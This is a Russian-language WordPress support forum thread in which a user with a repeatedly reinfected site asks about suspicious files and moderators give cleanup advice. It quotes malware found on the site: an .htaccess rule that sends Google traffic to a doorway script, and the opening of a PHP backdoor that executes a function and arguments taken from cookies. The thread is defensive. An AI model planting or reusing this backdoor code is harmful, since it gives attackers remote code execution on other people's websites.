Модератор
Yuri
(@yube)
или при обновлении он не затирает вирус?
Видимо, Вы не представляете, с какой скоростью вирусы множатся. Достаточно оставить один шел, и через несколько минут зараза будет кишмя кишить. А Вы говорите «неделю».
еще один вопрос
в файле .htaccess есть такой блок
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} google [OR]
RewriteCond %{HTTP_REFERER} google
RewriteCond %{REQUEST_URI} !(\.js|\.css|\.png|\.jpg|\.jpeg|\.gif|\.svg|\.ttf|\.woff|\.eot)
RewriteRule ^.*$ fcffc1.php [L]
</IfModule>
меня смущает предпоследняя строка
Юрий, я скачивал сайт и проверял его антивирусом, на что он ругался, я удалил
я скачивал сайт и проверял его антивирусом, на что он ругался, я удалил
Во-первых смотря каким антивирусом. Десткопные для виндовс не предназначены для поиска веб-вирусов. Проверять нужно айболитом или подобным. Но никто не не даст полную гарантию.
Во вторых вирусы могут быть не только вайлах сайта. Они могут быть и др каталогах сервера и базе.
В третьих, «удалять» — понятие весьма расплывчатое.
И последнее. От того что Вы удалите тело вируса уязвимость, через которую они вновь появляются, никуда не девается
Вот к примеру тема у Вас более чем годичной давности. С тех пор она обновилась ровно 10 раз.
меня смущает предпоследняя строка
вас должен смущать весь этот код, ведь доры отдаются боту гугла. удалите .htaccess и создайте его заново через «настройки\постоянные ссылки\сохранить изменения».
«создайте его заново через «настройки\постоянные ссылки\сохранить изменения»»
Это как, извините? Можно немного подробнее?
Можно немного подробнее?
Думаю, Flector советует Вам перейти в админ-панели в раздел Настройки -> Постоянные ссылки и нажать кнопку «Сохранить изменения» внизу страницы.
Спасибо.
Может кто знает, в корне сайта должен быть файл wp-includse.php с вот таким содержанием, или это тоже вирус?
<?php
if (isset($_COOKIE[«id»])) @$_COOKIE[«user»]($_COOKIE[«id»]);
error_reporting(E_ALL);
ini_set(‘display_errors’, ‘1’);
$self = basename($_SERVER[‘SCRIPT_NAME’]);
$url = ‘http://’.$_SERVER[‘HTTP_HOST’].$_SERVER[‘PHP_SELF’].’?’.$_SERVER[‘QUERY_STRING’];
if(strpos($url, ‘killme’) > -1){
unlink($self);
die();
}
$script_url = isset($_GET[‘script’]) ? $_GET[‘script’] : false;
if(!$script_url) exit();
function random($length, $chars = ‘123456789abcdefghijklmnpqrstuvwxyz’) {
$hash = »;
$max = strlen($chars) — 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
и т.д.
слабо скачать дистрибутив движка и просто банально удалить все php-файлы с сервера, которых нет в движке?
ну ведь очевидно же, что это вирсусня.
удаляю из корня подозрительные файлы, проходит несколько минут, они все уже восстановлены, а так же отредактирован файл .htaccess
и так каждый раз
Модератор
Yuri
(@yube)
Закройте сайт через .htaccess и удаляйте всю заразу. Бегать наперегонки с ботами — бесполезная затея.